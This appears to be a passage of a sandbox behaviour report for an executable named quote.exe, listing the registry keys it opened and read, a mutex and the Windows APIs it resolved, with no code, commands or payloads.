HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1244d1b3\7eb675fa
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|quote.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|quote.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|quote.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1244d1b3\254b1c7e
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles

Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

Global\CLR_CASOFF_MUTEX

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.IsProcessorFeaturePresent
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
kernel32.dll.QueryActCtxW
kernel32.dll.GetVersionExW
kernel32.dll.GetFullPathNameW
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
mscorjit.dll.getJit
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
